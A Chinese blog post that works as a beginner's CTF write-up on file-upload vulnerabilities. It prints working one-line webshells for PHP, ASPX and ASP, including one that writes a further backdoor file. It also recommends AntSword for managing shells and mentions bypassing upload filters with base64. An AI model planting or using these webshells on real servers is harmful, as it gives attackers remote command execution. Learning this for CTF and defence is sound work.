ctf文件上传基本思路+例题

目录

简介

一句话木马

蚁剑

例题 

总结思路

附言


简介

文件上传本质上就是将文件传输到服务器时没有做好检测和过滤,导致可上传恶意程序到服务器,从而获得后台权限来干点坏事。一般这个恶意脚本文件称为webshell,通过webshell我们可以查看服务器的目录结构或文件,以及来执行一些系统指令。小马和大马,简单来说,大马是多功能,危害大,体积大的木马,小马是隐蔽性强,体量小,更方便的小木马。一句话木马就属于小马,所以较易突破防护,而大马极易被过滤。

一句话木马

首先通过看一些题解和博客,发现一句话木马要根据语言的不同来考虑如何构建。比如

php:

<?php @eval($_POST[value]);?>

<?php fputs( fopen('xie.php','w') , '<? php eval($_POST[xie]) ?>' ) ; ?>
将当前目录下创建xie.php文件,并且将一句话木马写入xd.php中

(这里再转一个更多方式的一句话木马构造方式)

PHP一句话木马之小马 - 简书

aspx(asp.net):

<%@ Page Language=“Jscript”%>
<%eval(Request.Item[“value”])%>

asp:

<%execute(request(“v”))%>

蚁剑

当然这里就不得不提到蚁剑和菜刀,我使用的是蚁剑(当前中国菜刀已停止更新,最新版也有bug),那就以蚁剑为例。

安装教程:中国蚁剑安装教程_rab3it的博客-CSDN博客_中国蚁剑

例题 

 在这里以攻防世界的webshell为例

 

很明显的一句话木马eval为执行括号中指令。而shell在我的理解中和sql的注入点差不多,可以通过改变shell的值来构造一些代码并执行。也就是说可以将shell视为后门。

蚁剑中的连接密码应该就是指这个后门的值,而蚁剑能通过改变这个值来对服务器进行管理。

 

 登入后即可看到flag

 

总结思路

1.构造一句话木马

2. 注意过滤和防护,必要时使用文件,base64等知识绕过

3.使用万能的蚁剑。

附言

文件上传的题还得多刷寄道,然后做个集合。还是那句话吧,希望自己不要鸽了吧。

希望自己不要这么菜吧   _(:з」∠)_   ----L1men2

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值